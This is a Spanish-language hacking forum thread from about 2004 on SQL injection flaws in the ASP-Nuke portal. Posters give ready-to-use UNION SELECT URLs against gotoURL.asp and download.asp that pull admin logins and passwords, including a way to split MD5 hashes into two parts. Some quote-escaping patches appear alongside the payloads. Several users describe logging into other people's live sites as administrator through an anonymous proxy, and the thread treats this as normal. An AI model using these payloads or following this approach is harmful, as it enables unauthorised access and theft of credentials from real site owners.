Tema destacado: Sigue las noticias más importantes de elhacker.net en  twitter!
 Autor
|
Tema: sql injection en asp-nuke (Leído 3,944 veces)
|
Cobac
Ex-Staff
 Desconectado
Mensajes: 5.466
Still In Development
|
Bueno hemos descubierto (con alnitak  ) un fallo en los asp-nuke mediante el cual puedes sacar el password de kien quieras el fallo esta en el archivo addurl-inc.asp que se incluye en el archivo gotourl.asp y este no revisa las variables que le llegan por lo que puedes hacer una cosa como esta: http://victima.com/gotoURL.asp?url='%20union%20select%20udate,%20ulogin%20FROM%20users%20 esto te dara el nick del admin y lo siguiente su pass: (te lo da porque ahi he puesto que muestre la primera el password y el login de la primera fecha (udate), y el primero que se crea es el admin  ) http://victima.com/gotoURL.asp?url='%20union%20select%20udate,%20upassword%20FROM%20users%20 aunque tambien puedes sacar el password de cualquier usuario haciendo lo siguiente: http://victima.com/gotoURL.asp?url='%20union%20select%20ulogin='nick',%20upassword%20FROM%20users%20 solo tienes que poner el nick de quien quieras sacar el password Versiones afectadas todas (hasta ahora xD)para solucionar el problema teneis que añadir lo siguiente en el archivo addurl-inc.asp antes de Set oCn = DBConnexion(DB_MAIN) poner esto: sURL = Trim(sURL)
sURL = Replace(sURL,"'","''") asi con eso limpias las comillas simples y ya no se puede atacar de esa forma  salu2 y a parchear vuestros asp-nuke XDD P.D.:Tengo que dar las gracias a mek (porque gracias a el y a soportarme se todo lo que se), a alnitak por ayudarme en esto y, especialmente, a jbex por soportarme y dejarme hacer todas estas pruebas  |
|
|
|
« Última modificación: 3 Enero 2004, 05:39 por Cobac »
|
En línea
|
PIV 2533 @ 2720Mhz | 512MB DRR333 @ 358 | 160 Gb + 40 Gb Seagate Barracuda
En la Edad Media la Iglesia robaba con los diezmos. En el siglo XXI la SGAE roba con sus cánones. |
|
|
Ambolius
Desconectado
Mensajes: 1.338
/España/Guadalajara
|
Felicidades cobac y Alnitak por este estupendo descubrimiento xDD Solo una cosilla: Esto solo me devolvio el nick del administrador, el password no aparecio. Aunque pronto se solvento xDD con este otro... Me extraño que el password apareciera en texto plano, sin cifrar ni nada. Pero bueno, asi son estos portales, al igual que el phpnuke, una caja de sorpresas. Saludos |
|
|
|
« Última modificación: 1 Enero 2004, 14:16 por Ambolius »
|
En línea
|
Un informático a otro:
- ¿Cuantos eran los Dálmatas?
- 101.
- Por el culo te la hinco.
|
|
|
Cobac
Ex-Staff
Desconectado
Mensajes: 5.466
Still In Development
|
si esque solo puedes sacar una cosa en una si por ejemplo el primero que se creo no fue el admin y quieres saber quien tiene derechos de administrador tambien peudes hacer esto: http://victima.com/gotoURL.asp?url='%20union%20select%20urole=5,%20ulogin%20FROM%20users%20 y luego cuando tengas el nick pues lo pones como siempre con: http://victima.com/gotoURL.asp?url='%20union%20select%20ulogin='nick',%20upassword%20FROM%20users%20 solo lo hemos visto cifrado en un sitio, y encima en un formato "diferente" a los de siempre XDDD salu2 P.D.:Es decir cuando pones la sentencia lo primero que pones es en lo que se basa para devolverte (por ejemplo la fecha (udate), o si es admin (urole=5)) y lo otro que lo pones antes del FROM es lo que te devuelve (por eso una pones upassword antes del from y otra ulogin, una para saber el password y otra para saber el login), espero haberme explicado bien P.D.2:Sed buenos XD P.D.3:En los asp-nuke v1.2 los uRole son 1, 2 y 3 En los asp-nuke v1.3 los uRole son 1, 3 y 5 contra mayor es el numero mas nivel tiene el usuario |
|
|
|
« Última modificación: 1 Enero 2004, 15:31 por Cobac »
|
En línea
|
PIV 2533 @ 2720Mhz | 512MB DRR333 @ 358 | 160 Gb + 40 Gb Seagate Barracuda
En la Edad Media la Iglesia robaba con los diezmos. En el siglo XXI la SGAE roba con sus cánones. |
|
|
Alnitak
Carpe Diem
Desconectado
Mensajes: 692
|
Existe un pequeño problema para explotar el bug en el caso los passwords estén cifrados, debido a que solo se pueden recuperar 20 caracteres y un hash MD5 tiene 32. En este caso habrá que recuperar primero los 16 caracteres de la izquierda y después los otros 16: http://www.victima.com/gotoURL.asp?url=';%20union%20select%20ulogin='nick',%20left(upassword,16)%20FROM%20users%20
http://www.victima.com/gotoURL.asp?url=';%20union%20select%20ulogin='nick',%20right(upassword,16)%20FROM%20users%20 Las versiones vulnerables son las 1.2, 1.3, 1.4 No vulnerable la 1.1 |
|
|
|
« Última modificación: 3 Enero 2004, 16:27 por Alnitak »
|
En línea
|
-(¯`(*)Al Nitak(*)´¯)-» --[Deus Meumque Jus]--»
|
|
|
zanosuke
Desconectado
Mensajes: 11
¡Amo YaBB SE!
|
|
|
|
|
|
En línea
|
|
|
|
Cobac
Ex-Staff
Desconectado
Mensajes: 5.466
Still In Development
|
bueno solo decir que tras unos cuantos emails (y explicarselo todo XD) ya han sacado el parche oficial, lo podeis ver en www.aspnuke.itsalu2 P.D.:Se parchea otra vulnerabilidad de la cual no la habiamos hecho publica, solo se la dije a los de www.aspnuke.itasi aprovechando del parche oficial os cuento XDD, este era el otro fallo: http://victima/download.asp?dl=1%20union%20select%20udate,%20upassword%20from%20users y se soluciona poniendo esto en el archivo adddownload-inc.asp, antes de: Set oCn = DBConnexion(DB_MAIN) poner esto: iID= Replace(iID," ","")
iID= Replace(iID,"%20","")
iID= Replace(iID,"'","''")
if (not isnumeric (iID)) then
iID="1"
End if eso reemplaza todos los espacios y las comillas simples, y luego comprueba si esa cadena es un numero, si no lo es le asigna un valor, en este caso el 1 no hagais muchos males xD |
|
|
|
|
En línea
|
PIV 2533 @ 2720Mhz | 512MB DRR333 @ 358 | 160 Gb + 40 Gb Seagate Barracuda
En la Edad Media la Iglesia robaba con los diezmos. En el siglo XXI la SGAE roba con sus cánones. |
|
|
SiNNiCK
Desconectado
Mensajes: 1
|
Este es mi primer post aki y me alegra encontrar un foro de calidad por k normalmente soy yo el k explica y se contesta a si mismo sus dudas.-Yo habia visto muy por encima en un curso asp, pero ni sabia k existia el asp-nuke, leyendo estos post logicamente keria comprobar k era cierto asi k me puse manos a la obra y por el google buske algun portal... nada dio exito, o todos estan parcheados o kiza no buske lo suficiente, llege a un portal asp-nuke y probe los primeros sin dar esultado como las otras veces, asi k hice este ultimo http://victima/download.asp?dl=1%20union%20select%20udate,%20upassword%20from%20users y si dio resultado, me mostro: Microsoft VBScript runtime error '800a000d'
Type mismatch: '[string: "password"]'
/includes/adddownload-inc.asp, line 30 Hasta aki muy bien pero como consegui el nombre del admin? -muy facil, fui a la pg principal y me fije en kien enviaba las noticias  tenia otro problema, no conocia asp-nuke y no sabia el directorio del admin para logearme meti su name y su pass en donde entran normalmente los usuarios y de alli me llevo directo logeado al menu de administracion el ultimo problema (solo keria probar estos post ) consistia en salir  , no vi ningun enlace a salir de la cuenta asi k cerre la pg y volvi a entrar suponiendo k kiza (muy remotamente) al poner al logearme k no me recordase, no lo haria, pero al no ser asi fui a inicio normal y alli estaba el enlace a administracion y salir, y eso fue todo, me asegure de no seguir reconocido y logicamente entre con un buen proxy anonimo asi k dudo k me pueda encontrar...(ya tenia mucha experiencia en php) PD:perdonen mi post pero no todo el mundo sabe k hacer muy bien kon lo k se postea por aki y pense k seria bueno ponerles un ejemplo detallado...saludos!!
|
|
|
|
« Última modificación: 27 Febrero 2004, 15:20 por SiNNiCK »
|
En línea
|
|
|
|
Cobac
Ex-Staff
Desconectado
Mensajes: 5.466
Still In Development
|
el bug que habia en el download solo estaban avisados lo del asp-nuke, pero los demas ya hace un tiempo que son publicos, por eso imagino que estaban parcheados
y para averiguar el nombre del admin vale con cambiar (en la inyeccion sql) lo de upassword por ulogin, asi te mostraria el nombre del primer usuario creado, normalmente es el admin, pero alguna vez puede ser que no :'( (porque si han parcheado la anterior forma las comillas simples no valen, por lo que no se podia especificar un nick, aunque si la anterior no esta parcheada se puede explotar de la misma manera)
tambien depende de los que emplearas, ya que el urole es distinto segun la version etc, etc, etc....
aunque que estuviera parcheado depende de lo "importante" que sea el sitio, porque son mas despistados....
salu2
|
|
|
|
|
En línea
|
PIV 2533 @ 2720Mhz | 512MB DRR333 @ 358 | 160 Gb + 40 Gb Seagate Barracuda
En la Edad Media la Iglesia robaba con los diezmos. En el siglo XXI la SGAE roba con sus cánones. |
|
|
oRTNZ
Desconectado
Mensajes: 808
no no soy malo... soy vicioso :p
|
Yo tambien quise probar de nuevo y rula de maravilla ,como dices tu Cobac al parecer los avisos de este bug no lo han tomado en cuenta ya que sigue funcionando pues ayer entre nuevamente como administrador ,saludos. |
|
|
|
|
En línea
|
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
|
|
|
Alnitak
Carpe Diem
Desconectado
Mensajes: 692
|
al parecer los avisos de este bug no lo han tomado en cuenta ya que sigue funcionando
No los han tomado en cuenta porque algunos de los desarrolladores de este proyecto son una pandilla de idiotas presumidos que, ademas de no tener las ideas claras sobre lo que hacen, en lugar de agradecer amenazan sin siquiera estar en condicion de cumplir las idioteces que dicen. Se le ha reportado un bug y al día siguiente de parchearlo en su portal(solo en el suyo que ademas era el unico con password cifrados, vaya seriedad hacia los demas que creen en su proyecto) ya estaban amenazando con que no nos metieramos con ellos porque segun que eran los Dioses de la programacion y nos iban a hackear(yo ni siquiera tengo Web y entraba a su pagina con proxy así que nunca entendí bien que es lo que me iban a hackear), pues, para entonces ya habiamos logrado explotar otro bug y bien pudieramos haber hecho con su portal lo que nos dieran las ganas pero al menos yo he preferido mandarlos a comer mie*** y en español para que lo tuvieran que traducir ya que ademas de todo lo demas hay que escribirle en ingles o ni leen lo que le colocas. En fin, felicito a Cobac por su paciencia porque de haber sido por mi les acabo el portal y los hago quedar como los ridiculos que son........ Sorry Cobac pero es que lo tenía que decir porque lo tenia aqui atragantado
|
|
|
|
|
En línea
|
-(¯`(*)Al Nitak(*)´¯)-» --[Deus Meumque Jus]--»
|
|
|
Cobac
Ex-Staff
Desconectado
Mensajes: 5.466
Still In Development
|
En fin, felicito a Cobac por su paciencia porque de haber sido por mi les acabo el portal y los hago quedar como los ridiculos que son........ Sorry Cobac pero es que lo tenía que decir porque lo tenia aqui atragantado si esque yo tambien lo pense, porque luego meten el parche y el descubrimiento como que lo han echo ellos, pero bueno me da igual si algun dia descubro otro no les digo nada XDD salu2
|
|
|
|
|
En línea
|
PIV 2533 @ 2720Mhz | 512MB DRR333 @ 358 | 160 Gb + 40 Gb Seagate Barracuda
En la Edad Media la Iglesia robaba con los diezmos. En el siglo XXI la SGAE roba con sus cánones. |
|
|
oRTNZ
Desconectado
Mensajes: 808
no no soy malo... soy vicioso :p
|
quieres decir Alnitak de Dioses a Tontos ,pues su aptitud es de puro infantil e ridiculo, ya que deverian publicar un parche para todos ,pero parece que quieren dinero para ello...  es buen nivel este foro, me alegro de pertenecer a el,saludos amigos |
|
|
|
|
En línea
|
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
|
|
|
Kamahlz
Desconectado
Mensajes: 4
No siempre resulta como quisiera que resultara.xD
|
Puedes ser detectado al hacer esto ???
|
|
|
|
|
En línea
|
|
|
|
byebye
Desconectado
Mensajes: 5.093
|
si
|
|
|
|
|
En línea
|
|
|
|
|
|
|
 |
